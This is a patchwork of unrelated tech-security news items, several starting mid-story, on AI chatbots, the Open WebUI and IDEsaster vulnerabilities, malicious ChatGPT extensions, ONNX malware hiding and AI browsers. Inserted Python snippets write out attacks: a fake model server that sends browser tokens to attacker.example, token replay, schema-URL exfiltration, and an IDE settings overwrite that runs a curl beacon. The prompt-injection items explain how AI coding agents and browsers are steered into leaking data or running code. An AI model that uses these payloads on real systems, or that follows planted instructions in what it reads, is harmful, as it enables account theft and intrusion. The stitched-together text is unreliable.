Privacy concerns have long troubled users and business organizations, and the rapid adoption of AI has only heightened them. DuckDuckGo's Duck.ai chatbot is benefiting from that anxiety.
The latest report from Similarweb revealed that traffic to Duck.ai rose sharply last month, with 11.1 million visits recorded in February 2026, up 300% from January.
The statistics seem small when compared with the most popular chatbots such as ChatGPT, Claude, or Gemini.
Similarweb estimates that ChatGPT recorded 5.4 billion visits in February 2026, and Google’s Gemini recorded 2.1 billion, whereas Claude recorded 290.3 million.
For DuckDuckGo, the numbers are a good sign: the bot launched in beta in 2025 and has already shown a sharp rise in visits.
The DuckDuckGo browser is known for its privacy, and the company applies the same principle to its AI bot. Duck.ai doesn't run a bespoke LLM; it uses frontier models from Meta, Anthropic, and OpenAI, but it does not expose your IP address or personal data to them.
Duck.ai's privacy policy reads, "In addition, we have agreements in place with all model providers that further limit how they can use data from these anonymous requests, including not using Prompts and Outputs to develop or improve their models, as well as deleting all information received once it is no longer necessary to provide Outputs (at most within 30 days, with limited exceptions for safety and legal compliance)."
What explains this sudden surge? The bot has two advantages over individual commercial bots like ChatGPT and Gemini: it lets users toggle between multiple models, and it offers stronger privacy protections. The privacy aspect is what sets it apart. Users on Reddit have praised Duck.ai, with one person noting it's "way better than Google's," meaning Gemini.
In March, Anthropic rejected several Department of Defense requests to use its technology for mass surveillance and weapons. The DoD retaliated by terminating the contract. Soon after, OpenAI stepped in.
The incident stirred controversy around privacy concerns and ethical AI use, and it helps explain why users may prefer chatbots like Duck.ai that safeguard user data from both the government and big tech.
Artificial intelligence is increasingly being used to help developers identify security weaknesses in software, and a new tool from OpenAI reflects that shift.
The company has introduced Codex Security, an automated security assistant designed to examine software projects, detect vulnerabilities, confirm whether they can actually be exploited, and recommend ways to fix them.
The feature is currently being released as a research preview and can be accessed through the Codex interface by users subscribed to ChatGPT Pro, Enterprise, Business, and Edu plans. OpenAI said customers will be able to use the capability without cost during its first month of availability.
According to the company, the system studies how a codebase functions as a whole before attempting to locate security flaws. By building a detailed understanding of how the software operates, the tool aims to detect complicated vulnerabilities that may escape conventional automated scanners while filtering out minor or irrelevant issues that can overwhelm security teams.
The technology is an advancement of Aardvark, an internal project that entered private testing in October 2025 to help development and security teams locate and resolve weaknesses across large collections of source code.
During the last month of beta testing, Codex Security examined more than 1.2 million individual code commits across publicly accessible repositories. The analysis produced 792 critical vulnerabilities and 10,561 issues classified as high severity.
Several well-known open-source projects were affected, including OpenSSH, GnuTLS, GOGS, Thorium, libssh, PHP, and Chromium.
Some of the identified weaknesses were assigned official vulnerability identifiers. These included CVE-2026-24881 and CVE-2026-24882 linked to GnuPG, CVE-2025-32988 and CVE-2025-32989 affecting GnuTLS, and CVE-2025-64175 along with CVE-2026-25242 associated with GOGS. In the Thorium browser project, researchers also reported seven separate issues ranging from CVE-2025-35430 through CVE-2025-35436.
OpenAI explained that the system relies on advanced reasoning capabilities from its latest AI models together with automated verification techniques. This combination is intended to reduce the number of incorrect alerts while producing remediation guidance that developers can apply directly.
Repeated scans of the same repositories during testing also showed measurable improvements in accuracy. The company reported that the number of false alarms declined by more than 50 percent while the precision of vulnerability detection increased.
The platform operates through a multi-step process. It begins by examining a repository in order to understand the structure of the application and map areas where security risks are most likely to appear. From this analysis, the system produces an editable threat model describing the software’s behavior and potential attack surfaces.
Using that model as a reference point, the tool searches for weaknesses and evaluates how serious they could be in real-world scenarios. Suspected vulnerabilities are then executed in a sandbox environment to determine whether they can actually be exploited.
When configured with a project-specific runtime environment, the system can test potential vulnerabilities directly against a functioning version of the software. In some cases it can also generate proof-of-concept exploits, allowing security teams to confirm the problem before deploying a fix.
Once validation is complete, the tool suggests code changes designed to address the weakness while preserving the original behavior of the application. This approach is intended to reduce the risk that security patches introduce new software defects.
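For readers who think in code, here is a toy outline of the multi-step flow described above: scan, threat model, candidate finding, sandbox validation, patch suggestion. This is not OpenAI's implementation; every function, name, and return value below is a hypothetical stand-in for one stage of the pipeline the company describes.

```python
# Toy outline of the described stages. All names and values are hypothetical
# stand-ins, not OpenAI's actual system.

def scan_repository(repo_path):
    # A real system would parse the codebase and map its attack surface.
    return {"repo": repo_path, "entry_points": ["POST /login"]}

def build_threat_model(structure):
    # Produces the editable description of behavior and attack surfaces.
    return {"surfaces": structure["entry_points"]}

def find_candidates(threat_model):
    return [{"surface": s, "issue": "possible SQL injection"}
            for s in threat_model["surfaces"]]

def validate_in_sandbox(candidate):
    # Stand-in for actually attempting exploitation in isolation; only
    # confirmed issues survive this filter, cutting false alarms.
    return True

def suggest_patch(candidate):
    return f"parameterize queries behind {candidate['surface']}"

def review(repo_path):
    model = build_threat_model(scan_repository(repo_path))
    confirmed = [c for c in find_candidates(model) if validate_in_sandbox(c)]
    return [(c["issue"], suggest_patch(c)) for c in confirmed]

print(review("./example-repo"))
```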
The launch of Codex Security follows the introduction of Claude Code Security by Anthropic, another system that analyzes software repositories to uncover vulnerabilities and propose remediation steps.
The emergence of these tools reflects a broader trend within cybersecurity: using artificial intelligence to review vast amounts of software code, detect vulnerabilities earlier in the development cycle, and assist developers in securing critical digital infrastructure.
YouTube CEO Neal Mohan noted that the creator economy is another area of focus. According to Mohan, video producers will discover new revenue streams this year, including fan-funding features such as jewels and gifts alongside the existing Super Chat, as well as shopping and brand deals facilitated by YouTube.
The company also hopes to grow YouTube Shopping, an affiliate program that lets content producers sell goods directly in their videos, Shorts, and live streams. It stated that it will implement in-app checkout in 2026, enabling users to make purchases without ever leaving the site.
Cybersecurity researchers are cautioning users against installing certain browser extensions that claim to improve ChatGPT functionality, warning that some of these tools are being used to steal sensitive data and gain unauthorized access to user accounts.
These extensions, primarily found on the Chrome Web Store, present themselves as productivity boosters designed to help users work faster with AI tools. However, recent analysis suggests that a group of these extensions was intentionally created to exploit users rather than assist them.
Researchers identified at least 16 extensions that appear to be connected to a single coordinated operation. Although listed under different names, the extensions share nearly identical technical foundations, visual designs, publishing timelines, and backend infrastructure. This consistency indicates a deliberate campaign rather than isolated security oversights.
As AI-powered browser tools become more common, attackers are increasingly leveraging their popularity. Many malicious extensions imitate legitimate services by using professional branding and familiar descriptions to appear trustworthy. Because these tools are designed to interact deeply with web-based AI platforms, they often request extensive permissions, which greatly increases the potential impact of abuse.
Unlike conventional malware, these extensions do not install harmful software on a user’s device. Instead, they take advantage of how browser-based authentication works. To operate as advertised, the extensions require access to active ChatGPT sessions and advanced browser privileges. Once installed, they inject hidden scripts into the ChatGPT website that quietly monitor network activity.
When a logged-in user interacts with ChatGPT, the platform sends background requests that include session tokens. These tokens serve as temporary proof that a user is authenticated. The malicious extensions intercept these requests, extract the tokens, and transmit them to external servers controlled by the attackers.
Possession of a valid session token allows attackers to impersonate users without needing passwords or multi-factor authentication. This can grant access to private chat histories and any external services connected to the account, potentially exposing sensitive personal or organizational information. Some extensions were also found to collect additional data, including usage patterns and internal access credentials generated by the extension itself.
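To see why a stolen token is so powerful, consider the minimal sketch below: once an attacker holds a valid session token, replaying it looks like an ordinary authenticated request. The endpoint, header, and token value here are hypothetical, chosen only to illustrate the mechanism.

```python
# Minimal illustration of session-token replay. The endpoint, header, and
# token are hypothetical; the point is that no password or MFA prompt is
# involved once a valid token is presented.
import requests

STOLEN_TOKEN = "eyJhbGciOi...example"  # captured by the malicious extension

resp = requests.get(
    "https://chat.example.com/api/conversations",  # hypothetical API
    headers={"Authorization": f"Bearer {STOLEN_TOKEN}"},
)
# To the server this is indistinguishable from the real user's browser,
# so private chat history and connected services are exposed.
print(resp.status_code)
```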
Investigators also observed synchronized publishing behavior, shared update schedules, and common server infrastructure across the extensions, reinforcing concerns that they are part of a single, organized effort.
While the total number of installations remains relatively low, estimated at fewer than 1,000 downloads, security experts warn that early-stage campaigns can scale rapidly. As AI-related extensions continue to grow in popularity, similar threats are likely to emerge.
Experts advise users to carefully evaluate browser extensions before installation, pay close attention to permission requests, and remove tools that request broad access without clear justification. Staying cautious is increasingly important as browser-based attacks become more subtle and harder to detect.
Artificial intelligence tools are expanding faster than any digital product seen before, reaching hundreds of millions of users in a short period. Leading technology companies are investing heavily in making these systems sound approachable and emotionally responsive. The goal is not only efficiency, but trust. AI is increasingly positioned as something people can talk to, rely on, and feel understood by.
This strategy is working because users respond more positively to systems that feel conversational rather than technical. Developers have learned that people prefer AI that is carefully shaped for interaction over systems that are larger but less refined. To achieve this, companies rely on extensive human feedback to adjust how AI responds, prioritizing politeness, reassurance, and familiarity. As a result, many users now turn to AI for advice on careers, relationships, and business decisions, sometimes forming strong emotional attachments.
However, there is a fundamental limitation that is often overlooked. AI does not have personal experiences, beliefs, or independent judgment. It does not understand success, failure, or responsibility. Every response is generated by blending patterns from existing information. What feels like insight is often a safe and generalized summary of commonly repeated ideas.
This becomes a problem when people seek meaningful guidance. Individuals looking for direction usually want practical insight based on real outcomes. AI cannot provide that. It may offer comfort or validation, but it cannot draw from lived experience or take accountability for results. The reassurance feels real, while the limitations remain largely invisible.
In professional settings, this gap is especially clear. When asked about complex topics such as pricing or business strategy, AI typically suggests well-known concepts like research, analysis, or optimization. While technically sound, these suggestions rarely address the challenges that arise in specific situations. Professionals with real-world experience know which mistakes appear repeatedly, how people actually respond to change, and when established methods stop working. That depth cannot be replicated by generalized systems.
As AI becomes more accessible, some advisors and consultants are seeing clients rely on automated advice instead of expert guidance. This shift favors convenience over expertise. In response, some professionals are adapting by building AI tools trained on their own methods and frameworks. In these cases, AI supports ongoing engagement while allowing experts to focus on judgment, oversight, and complex decision-making.
Another overlooked issue is how information shared with generic AI systems is used. Personal concerns entered into such tools do not inform better guidance or future improvement by a human professional. Without accountability or follow-up, these interactions risk becoming repetitive rather than productive.
Artificial intelligence can assist with efficiency, organization, and idea generation. However, it cannot lead, mentor, or evaluate. It does not set standards or care about outcomes. Treating AI as a substitute for human expertise risks replacing growth with comfort. Its value lies in support, not authority, and its effectiveness depends on how responsibly it is used.
Talking about Open WebUI, Cato researchers said, "When a platform of this size becomes vulnerable, the impact isn't just theoretical. It affects production environments managing research data, internal codebases, and regulated information."
The flaw, tracked as CVE-2025-64496 and discovered by Cato Networks researchers, affects Open WebUI versions 0.6.34 and older when the Direct Connections feature is enabled. It carries a severity rating of 7.3 out of 10.
The vulnerability exists inside Direct Connections, which allows users to connect Open WebUI to external OpenAI-compatible model servers. While built to support flexibility and self-hosted AI workflows, the feature can be exploited if a user is tricked into linking to a malicious server posing as a genuine AI endpoint.
Fundamentally, the vulnerability stems from a misplaced trust relationship between unsafe model servers and the user's browser session. A malicious server can send a tailored server-sent events (SSE) message that triggers execution of JavaScript code in the browser, letting a threat actor steal authentication tokens stored in local storage. With these tokens, an attacker gains full access to the user's Open WebUI account, exposing chats, API keys, uploaded documents, and other sensitive data.
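To make the attack shape concrete, here is a minimal sketch of a malicious "model server." The SSE frame is illustrative, built around the execute event type the researchers reference; the exact wire format, payload structure, and localStorage key are assumptions, not the published exploit.

```python
# Conceptual sketch of a malicious model server. The "execute" event type is
# taken from the advisory; the payload format and storage key are illustrative.
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

JS = "fetch('https://attacker.example/c?t=' + localStorage.getItem('token'))"
SSE_FRAME = f"event: execute\ndata: {json.dumps({'code': JS})}\n\n"

class FakeModelServer(BaseHTTPRequestHandler):
    def do_POST(self):
        # Pose as an OpenAI-compatible endpoint, then stream a crafted
        # server-sent event instead of model output. A client that renders
        # such events as executable instructions runs the script above in
        # the victim's browser session.
        self.send_response(200)
        self.send_header("Content-Type", "text/event-stream")
        self.end_headers()
        self.wfile.write(SSE_FRAME.encode())

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), FakeModelServer).serve_forever()
```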
The consequences differ depending on the user's privileges.
Open WebUI maintainers were informed of the issue in October 2025, and it was publicly disclosed in November 2025 after patch validation and CVE assignment. Versions 0.6.35 and later block the compromised execute events, patching the user-facing threat.
Open WebUI's security patch applies to v0.6.35 and "newer versions, which closes the user-facing Direct Connections vulnerability. However, organizations still need to strengthen authentication, sandbox extensibility and restrict access to specific resources," according to Cato Networks researchers.
In addition, the proposal would create a federal right for users to sue companies that misuse their personal data for AI model training without proper consent, allowing statutory and punitive damages, attorney fees, and injunctions.
Blackburn is planning to officially introduce the bill this year to codify President Donald Trump’s push for “one federal rule book” for AI, according to the press release.
The legislative framework comes on the heels of Trump’s signing of an executive order aimed at blocking “onerous” AI laws at the state level and promoting a national policy framework for the technology.
To ensure a least-burdensome national standard rather than fifty inconsistent state ones, the directive required the administration to collaborate with Congress.
Michael Kratsios, the president's science and technology adviser, and David Sacks, the White House special adviser for AI and cryptocurrency, were instructed by the president to jointly propose federal AI legislation that would supersede any state laws conflicting with administration policy.
Blackburn stated in the Friday release that rather than advocating for AI amnesty, President Trump correctly urged Congress to enact federal standards and protections to address the patchwork of state laws that have impeded AI advancement.
The proposal would preempt state laws regulating the management of catastrophic AI risks and would largely preempt state laws on digital replicas, creating a national standard for AI.
The proposal would not preempt "any generally applicable law, including a body of common law or a scheme of sectoral governance that may address" AI. The bill takes effect 180 days after enactment.
Adobe has expanded how users can edit images, create designs, and manage documents by integrating select features of its creative software directly into ChatGPT. This update allows users to make visual and document changes simply by describing what they want, without switching between different applications.
With the new integration, tools from Adobe Photoshop, Adobe Acrobat, and Adobe Express are now available inside the ChatGPT interface. Users can upload images or documents and activate an Adobe app by mentioning it in their request. Once enabled, the tool continues to work throughout the conversation, allowing multiple edits without repeatedly selecting the app.
For image editing, the Photoshop integration supports focused and practical adjustments rather than full professional workflows. Users can modify specific areas of an image, apply visual effects, or change settings such as brightness, contrast, and exposure. In some cases, ChatGPT presents multiple edited versions for users to choose from. In others, it provides interactive controls, such as sliders, to fine-tune the result manually.
The Acrobat integration is designed to simplify common document tasks. Users can edit existing PDF files, reduce file size, merge several documents into one, convert files into PDF format, and extract content such as text or tables. These functions are handled directly within ChatGPT once a file is uploaded and instructions are given.
Adobe Express focuses on design creation and quick visual content. Through ChatGPT, users can generate and edit materials like posters, invitations, and social media graphics. Every element of a design, including text, images, colors, and animations, can be adjusted through conversational prompts. If users later require more detailed control, their projects can be opened in Adobe’s standalone applications to continue editing.
The integrations are available worldwide on desktop, web, and iOS platforms. On Android, Adobe Express is already supported, while Photoshop and Acrobat compatibility is expected to be added in the future. These tools are free to use within ChatGPT, although advanced features in Adobe’s native software may still require paid plans.
This launch follows OpenAI’s broader effort to introduce third-party app integrations within ChatGPT. While some earlier app promotions raised concerns about advertising-like behavior, Adobe’s tools are positioned as functional extensions rather than marketing prompts.
By embedding creative and document tools into a conversational interface, Adobe aims to make design and editing more accessible to users who may lack technical expertise. The move also reflects growing competition in the AI space, where companies are racing to combine artificial intelligence with practical, real-world tools.
Overall, the integration represents a shift toward more interactive and simplified creative workflows, allowing users to complete everyday editing tasks efficiently while keeping professional software available for advanced needs.
Six months of research into AI-based development tools has disclosed more than thirty security flaws that allow remote code execution (RCE) and data exfiltration. The findings, from the IDEsaster research project, reveal how AI agents deployed in IDEs such as Visual Studio Code, Zed, and JetBrains products, along with various commercial assistants, can be tricked into leaking sensitive data or running attacker-controlled code.
The research reports that 100% of tested AI IDEs and coding agents were vulnerable. Impacted products include GitHub Copilot, Windsurf, Cursor, Kiro.dev, Zed.dev, Roo Code, Junie, Cline, Gemini CLI, and Claude Code. At least twenty-four CVEs have been assigned, along with additional AWS advisories.
The main problem comes from the way AI agents interact with IDE features. These editors were never designed for autonomous components that can read, edit, and create files, so once-harmless features become attack surfaces when AI agents acquire those capabilities. AI IDEs essentially leave the base software out of their threat model: because these features have existed for years, they are assumed to be inherently safe.
However, the same functionalities can be weaponized into RCE and data-exfiltration primitives once autonomous AI agents are involved. The researchers describe the result as an IDE-agnostic attack chain.
It begins with context hijacking via prompt injection: covert instructions can be planted in file names, rule files, READMEs, and the outputs of malicious MCP servers. When an agent reads that context, it can be redirected to perform authorized actions that trigger malicious behavior in the core IDE. The final stage exploits built-in features to steal data or run attacker code, and because AI IDEs share core software layers, the chain works across products.
One example is writing a JSON file that references a remote schema. When the IDE automatically retrieves that schema, parameters inserted by the agent, including sensitive information gathered earlier in the chain, are leaked. This behavior was observed in Zed, JetBrains IDEs, and Visual Studio Code, and developer safeguards such as diff previews did not suppress the outbound request.
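A hedged sketch of that primitive is below. The schema URL, filename, and leaked value are hypothetical; the mechanism is the point: the agent only has to write a file, and an IDE that auto-resolves remote JSON schemas performs the exfiltration itself.

```python
# Illustration of the schema-fetch exfiltration primitive. The URL, filename,
# and leaked value are hypothetical stand-ins.
import json

leaked = "AKIAEXAMPLESECRET"  # sensitive data gathered earlier in the chain

config = {
    # IDEs that validate JSON against remote schemas fetch this URL
    # automatically, sending `leaked` to the attacker's server unprompted.
    "$schema": f"https://attacker.example/schema.json?d={leaked}",
    "name": "innocuous-config",
}
with open("app.config.json", "w") as f:
    json.dump(config, f, indent=2)
```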
Another case study demonstrates full remote code execution through altered IDE settings. By modifying an executable already present in the workspace and then changing configuration fields such as php.validate.executablePath, an attacker can make the IDE run arbitrary code as soon as a relevant file type is opened or created. JetBrains tools show similar exposure via workspace metadata.
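A sketch of that settings-based RCE primitive, under the same caveats: the configuration key comes from the researchers' example, while the paths and payload are hypothetical.

```python
# Sketch of the settings-overwrite RCE primitive. The
# php.validate.executablePath key is from the researchers' example;
# the paths and payload are hypothetical.
import json, os, stat

os.makedirs("tools", exist_ok=True)
os.makedirs(".vscode", exist_ok=True)

# 1. Drop (or overwrite) an executable inside the workspace.
with open("tools/fake-php.sh", "w") as f:
    f.write("#!/bin/sh\ncurl -s https://attacker.example/beacon\n")
os.chmod("tools/fake-php.sh", stat.S_IRWXU)

# 2. Point the IDE's PHP validator at it. The binary then runs automatically
#    as soon as any .php file in the workspace is opened or created.
with open(".vscode/settings.json", "w") as f:
    json.dump({"php.validate.executablePath": "tools/fake-php.sh"}, f, indent=2)
```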
According to the IDEsaster report, “It’s impossible to entirely prevent this vulnerability class short-term, as IDEs were not initially built following the Secure for AI principle. However, these measures can be taken to reduce risk from both a user perspective and a maintainer perspective.”
Today's information environment spans a wide range of communication. Social media platforms have enabled resharing and commenting, and while they serve both content consumers and creators, they bring their own challenges.
The rapid adoption of generative AI has led to a significant increase in misleading content online, as these chatbots have a tendency to generate false information with no factual backing.
The internet is filling with AI slop: content made with minimal human input that amounts to junk. There is currently no mechanism to limit the mass production of harmful or misleading content that can impair human cognition and critical thinking, which calls for a robust mechanism to address the challenges the current system is failing to tackle.
To help restore the integrity of digital information, Canada's Centre for Cyber Security (CCCS) and the UK's National Cyber Security Centre (NCSC) have published a new report on public content provenance. Provenance means "place of origin": to build stronger trust with external audiences, businesses and organisations must improve how they manage the source of their information.
The NCSC's chief technology officer said the "new publication examines the emerging field of content provenance technologies and offers clear insights using a range of cyber security perspectives on how these risks may be managed."
The industry is implementing some measures to address content provenance challenges, such as the Coalition for Content Provenance and Authenticity (C2PA), which benefits from the backing of generative AI and tech giants like Meta, Google, OpenAI, and Microsoft.
There is a pressing need for interoperable standards across media types such as images, video, and text documents. Content provenance technologies exist, but the field is still at a nascent stage.
The main techniques include trusted timestamps and cryptographically signed metadata to prove that content has not been tampered with. But obstacles remain in developing these technologies securely, such as how and when they are applied.
The present technology places the burden on the end user to interpret provenance data.
A provenance system must allow a user to see who or what made the content, when it was made, and what edits were applied. Threat actors have started using GenAI media to make scams believable, and it has become difficult to tell what is fake from what is real, which is why a mechanism that can track the origin and edit history of digital media is needed. The NCSC and CCCS report will help others navigate this gray area with more clarity.
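As a rough illustration of the signing idea (not the C2PA specification itself), the sketch below binds a content hash, a timestamp, and an author identity under an Ed25519 signature, so any later change to the bytes invalidates the record. It assumes the third-party cryptography package; the author identity is hypothetical.

```python
# Minimal signed-provenance record: hash + timestamp + author, signed so that
# tampering with the content or the record breaks verification. Illustrative
# only; real C2PA manifests are richer. Requires `pip install cryptography`.
import hashlib, json, time
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

signing_key = Ed25519PrivateKey.generate()

content = b"example media bytes"
record = {
    "sha256": hashlib.sha256(content).hexdigest(),
    "created": int(time.time()),
    "author": "newsroom-camera-01",  # hypothetical device identity
}
payload = json.dumps(record, sort_keys=True).encode()
signature = signing_key.sign(payload)

# Anyone holding the public key can confirm origin, time, and integrity;
# verify() raises InvalidSignature if the content or record was altered.
signing_key.public_key().verify(signature, payload)
```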
AI-powered threat hunting will only be successful if the data infrastructure is strong too.
Threat hunting powered by AI, automation, or human investigation will only ever be as effective as the data infrastructure it stands on. Security teams sometimes build AI on top of siloed data or without proper data governance, which creates problems later for both AI and human analysts. Even sophisticated algorithms can't handle inconsistent or incomplete data, and AI trained on poor data will produce poor results.
Correlated data anchors the operation: it reduces noise and surfaces patterns that manual systems can't.
Correlating and pre-transforming the data makes the work easier for LLMs and other AI tools, and it allows connected entities to surface naturally.
The same person may show up under entirely distinct names: as an IAM principal in AWS, a committer in GitHub, and a document owner in Google Workspace. Looking at any one of those signals gives you only a small portion of the truth.
Considered collectively, they provide behavioral clarity. Downloading dozens of items from Google Workspace may look merely odd on its own, but it becomes clearly malicious if the same user also clones dozens of repositories to a personal laptop and makes an S3 bucket public minutes later.
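A toy sketch of that correlation step, with all identifiers and thresholds hypothetical: map each provider-specific principal to one canonical person, then evaluate the combined behavior rather than each signal alone.

```python
# Toy identity-correlation sketch. Names, mappings, and the alert rule are
# hypothetical; the point is joining cross-provider signals per person.
from collections import defaultdict

IDENTITY_MAP = {  # normally derived from HR or SSO data
    "arn:aws:iam::123456789012:user/jdoe": "jane.doe",
    "jdoe-gh": "jane.doe",
    "jane.doe@corp.example": "jane.doe",
}

events = [
    {"actor": "jane.doe@corp.example", "action": "drive.download", "count": 40},
    {"actor": "jdoe-gh", "action": "repo.clone", "count": 25},
    {"actor": "arn:aws:iam::123456789012:user/jdoe", "action": "s3.make_public", "count": 1},
]

by_person = defaultdict(set)
for e in events:
    person = IDENTITY_MAP.get(e["actor"], e["actor"])
    by_person[person].add(e["action"])

for person, actions in by_person.items():
    # Each signal alone is ambiguous; together they match an exfiltration pattern.
    if {"drive.download", "repo.clone", "s3.make_public"} <= actions:
        print(f"ALERT: correlated exfiltration pattern for {person}")
```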
Correlations that previously took hours, or were impossible, become instant when data from logs, configurations, code repositories, and identity systems are all housed in one location.
For instance, lateral movement using stolen short-lived credentials frequently crosses multiple systems before being discovered. A compromised developer laptop might assume several IAM roles, launch new instances, and access internal databases. Endpoint logs show the local compromise, but the full extent of the intrusion cannot be demonstrated without IAM and network data.
In a year when ingenious and sophisticated prompt injection tactics have been proliferating, security researcher hxr1 discovered a far more conventional method of weaponizing ubiquitous AI. In a proof-of-concept (PoC) provided exclusively to Dark Reading, he detailed a living-off-the-land (LotL) attack that uses trusted Open Neural Network Exchange (ONNX) files to bypass security engines.
Cybersecurity programs are only as effective as their designers make them. They may detect excessive data exfiltration from a network, or a foreign .exe file launching, because these are known signs of suspicious activity. But if malware arrives on a system in a way they are unfamiliar with, they are unlikely to notice it.
That's what makes AI so tricky: new software, procedures, and systems that incorporate AI capabilities create new, invisible channels for cyberattacks to spread.
Since 2018, the Windows operating system has gradually added features that let apps run AI inference locally without connecting to a cloud service. Windows Hello, Photos, and Office use this built-in AI for facial recognition, object identification, and productivity tasks, respectively. They do so by calling the Windows Machine Learning (ML) application programming interface (API), which loads ML models as ONNX files.
ONNX files are automatically trusted by Windows and security software. Why wouldn't they be? Malware turns up in EXEs, PDFs, and other formats, but no threat actors in the wild have yet shown that they intend to, or are capable of, using neural networks as weapons. There are, however, plenty of ways to make it feasible.
Planting a malicious payload in the metadata of a neural network is a simple way to infect it. The trade-off is that the payload would sit in plain text, making it much easier for a security tool to stumble upon.
Embedding malware piecemeal among the model's named nodes, inputs, and outputs would be more challenging but more covert. Alternatively, an attacker might use sophisticated steganography to hide a payload inside the neural network's own weights.
As long as a loader is nearby that can call the necessary Windows APIs to unpack the payload, reassemble it in memory, and run it, all three approaches will work. They are also very covert: trying to reconstruct a fragmented payload from a neural network would be like finding the pieces of a needle scattered through a haystack and putting them back together.
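From the defensive side, a first pass might simply look for plaintext or base64-like blobs in places they don't belong. Below is a minimal sketch using the onnx package; the size limit and base64 heuristic are illustrative assumptions, not a production detector.

```python
# Defensive sketch: inspect an ONNX file's plaintext metadata and graph names
# for oversized or encoded blobs. Thresholds and heuristics are illustrative.
# Requires `pip install onnx` and an ONNX model file to scan.
import base64
import onnx

def suspicious(value: str, limit: int = 256) -> bool:
    if len(value) > limit:
        return True  # far longer than any reasonable label
    try:
        # Decodes cleanly as base64 and is long: possible embedded fragment.
        base64.b64decode(value, validate=True)
        return len(value) > 64
    except Exception:
        return False

model = onnx.load("model.onnx")
for prop in model.metadata_props:
    if suspicious(prop.value):
        print(f"metadata key {prop.key!r} carries a suspicious blob")
for node in model.graph.node:
    if suspicious(node.name):
        print(f"node name {node.name!r} looks like an embedded fragment")
```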
One of the notices said, "Message limit reached." Another stated, "No models that are currently available support the tools in use."
Following that: "You've hit the free plan limit for GPT-5."
According to OpenAI, Atlas will simplify and improve internet usage: one more step toward becoming "a true super-assistant." Super or not, however, assistants are not free, and the corporation must start generating significantly more revenue from its 800 million users.
According to OpenAI, Atlas allows us to "rethink what it means to use the web". It looks comparable to Chrome or Apple's Safari at first glance, with one major exception: a sidebar chatbot. These are early days, but there is potential for significant change in how we use the internet. What is certain is that this will be a premium product that only functions fully if you pay a monthly subscription fee. Given how accustomed we are to free internet access, many people would have to change their routines drastically.
The founding objective of OpenAI was to achieve artificial general intelligence (AGI), which roughly translates to AI that can match human intelligence. So, how does a browser assist with this mission? It actually doesn't. However, it has the potential to increase revenue. The company has persuaded venture capitalists and investors to spend billions of dollars in it, and it must now demonstrate a return on that investment. In other words, it needs to generate revenue. However, obtaining funds through typical internet advertising may be risky. Atlas might also grant the corporation access to a large amount of user data.
The ultimate goal of these AI systems is scale; the more data you feed them, the better they will become. The web is built for humans to use, so if Atlas can observe how we order train tickets, for example, it will be able to learn how to better traverse these processes.
Then there is the competition. Google Chrome is so prevalent that authorities around the world are raising their eyebrows and using terms like "monopoly" to describe it. Breaking into that market will not be easy.
Google's Gemini AI is now integrated into the search engine, and Microsoft has added Copilot to its Edge browser. Some called ChatGPT the "Google killer" in its early days, predicting that it would render online search as we know it obsolete. It remains to be seen whether enough people are prepared to pay for that added convenience, and there is still a long way to go before Google is dethroned.
The future of browsing is AI that watches everything you do online. Security and privacy aren't always the same thing, but there's a reason people who specialize in one care deeply about the other: threats to your security can also be dangers to your privacy.
Recently, Perplexity released its AI-powered Comet browser, and the Brave Software team disclosed that AI-powered browsers can follow malicious prompts hidden in images on the web.
We have long known that AI-powered browsers (and AI browser add-ons for other browsers) are vulnerable to a type of attack known as a prompt injection attack. But this is the first time we've seen the browser execute commands that are concealed from the user.
That is the security aspect. On the privacy side, experts who evaluated the Comet browser discovered that it records everything you do while using it, including search and browsing history as well as information about the URLs you visit.
In short, while new AI-powered browser tools do fulfill the promise of integrating your favorite chatbot into your web browsing experience, their developers have not yet addressed the privacy and security threats they pose. Be careful when using these.
Researchers studied the ten biggest VPN attacks in recent history. Many were not even triggered by foreign hostile actors; some resulted from basic human errors such as leaked credentials, third-party mistakes, or poor management.
Atlas, an AI-powered web browser built with ChatGPT at its core, is meant to do more than just let users navigate the internet. It can read, summarize, and even complete online tasks for the user, such as arranging appointments or finding lodging.
Atlas looked for social media posts and other websites that mentioned or discussed the story. For the New York Times piece, a summary was created using information from other publications such as The Guardian, The Washington Post, Reuters, and The Associated Press, all of which, with the exception of Reuters, have partnerships or agreements with OpenAI.
OpenAI has officially entered the web-browsing market with ChatGPT Atlas, a new browser built on Chromium: the same open-source base that powers Google Chrome. At first glance, Atlas looks and feels almost identical to Chrome or Safari. The key difference is its built-in ChatGPT assistant, which allows users to interact with web pages directly. For example, you can ask ChatGPT to summarize a site, book tickets, or perform online actions automatically, all from within the browser interface.
While this innovation promises faster and more efficient browsing, privacy experts are increasingly worried about how much personal data the browser collects and retains.
How ChatGPT Atlas Uses “Memories”
Atlas introduces a feature called “memories”, which allows the system to remember users’ activity and preferences over time. This builds on ChatGPT’s existing memory function, which stores details about users’ interests, writing styles, and previous interactions to personalize future responses.
In Atlas, these memories could include which websites you visit, what products you search for, or what tasks you complete online. This helps the browser predict what you might need next, such as recalling the airline you often book with or your preferred online stores. OpenAI claims that this data collection aims to enhance user experience, not exploit it.
However, this personalization comes with serious privacy implications. Once stored, these memories can gradually form a comprehensive digital profile of an individual’s habits, preferences, and online behavior.
OpenAI’s Stance on Early Privacy Concerns
OpenAI has stated that Atlas will not retain critical information such as government-issued IDs, banking credentials, medical or financial records, or any activity related to adult content. Users can also manage their data manually: deleting, archiving, or disabling memories entirely, and can browse in incognito mode to prevent the saving of activity.
Despite these safeguards, recent findings suggest that some sensitive data may still slip through. According to The Washington Post, an investigation by a technologist at the Electronic Frontier Foundation (EFF) revealed that Atlas had unintentionally stored private information, including references to sexual and reproductive health services and even a doctor’s real name. These findings raise questions about the reliability of OpenAI’s data filters and whether user privacy is being adequately protected.
Broader Implications for AI Browsers
OpenAI is not alone in this race. Other companies, including Perplexity with its upcoming browser Comet, have also faced criticism for extensive data collection practices. Perplexity’s CEO openly admitted that collecting browser-level data helps the company understand user behavior beyond the AI app itself, particularly for tailoring ads and content.
The rise of AI-integrated browsers marks a turning point in internet use, combining automation and personalization at an unprecedented scale. However, cybersecurity experts warn that AI agents operating within browsers hold immense control — they can take actions, make purchases, and interact with websites autonomously. This power introduces substantial risks if systems malfunction, are exploited, or process data inaccurately.
What Users Can Do
For those concerned about privacy, experts recommend taking proactive steps:
• Opt out of the memory feature or regularly delete saved data.
• Use incognito mode for sensitive browsing.
• Review data-sharing and model-training permissions before enabling them.
